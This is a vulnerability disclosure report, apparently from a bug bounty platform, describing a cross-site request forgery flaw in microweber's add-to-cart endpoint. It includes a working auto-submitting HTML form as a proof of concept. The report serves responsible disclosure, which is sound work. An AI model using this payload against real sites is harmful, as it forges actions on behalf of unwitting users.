Cross-Site Request Forgery (CSRF) in microweber/microweber
Valid
Reported on Jul 20th 2021
✍️ Description
microweber is vulnerable to Cross-Site Request Forgery (CSRF). The application does not validate a CSRF token on the endpoint that adds products to the cart (`/api/update_cart`), so a POST issued by an attacker-controlled page is accepted as if the user had submitted it.
🕵️♂️ Proof of Concept
HTML content:
<!-- Attacker-controlled page. It carries no CSRF token: the point of the PoC is that the endpoint never asks for one. -->
<form id="form" action="http://localhost/api/update_cart" method="POST">
    <!-- Same fields a legitimate add-to-cart request sends -->
    <input type="text" name="for" value="content">
    <input type="text" name="for_id" value="1">
    <input type="text" name="price" value="100">
    <input type="submit">
</form>
<script>
    // Auto-submit after 2 seconds so the victim does not have to click anything.
    // "form" resolves to the element with id="form" through named window access.
    setTimeout(() => {
        form.submit();
    }, 2000);
</script>
- Save the above content into an HTML file.
- Open the file in a browser that already has a session on the target microweber site (the PoC targets http://localhost), wait for the auto-submit, then check the cart.
💥 Impact
When a victim visits a malicious page, the attacker can add products to the victim's cart without any action or consent from the victim.
We have contacted a member of the microweber team and are waiting to hear back.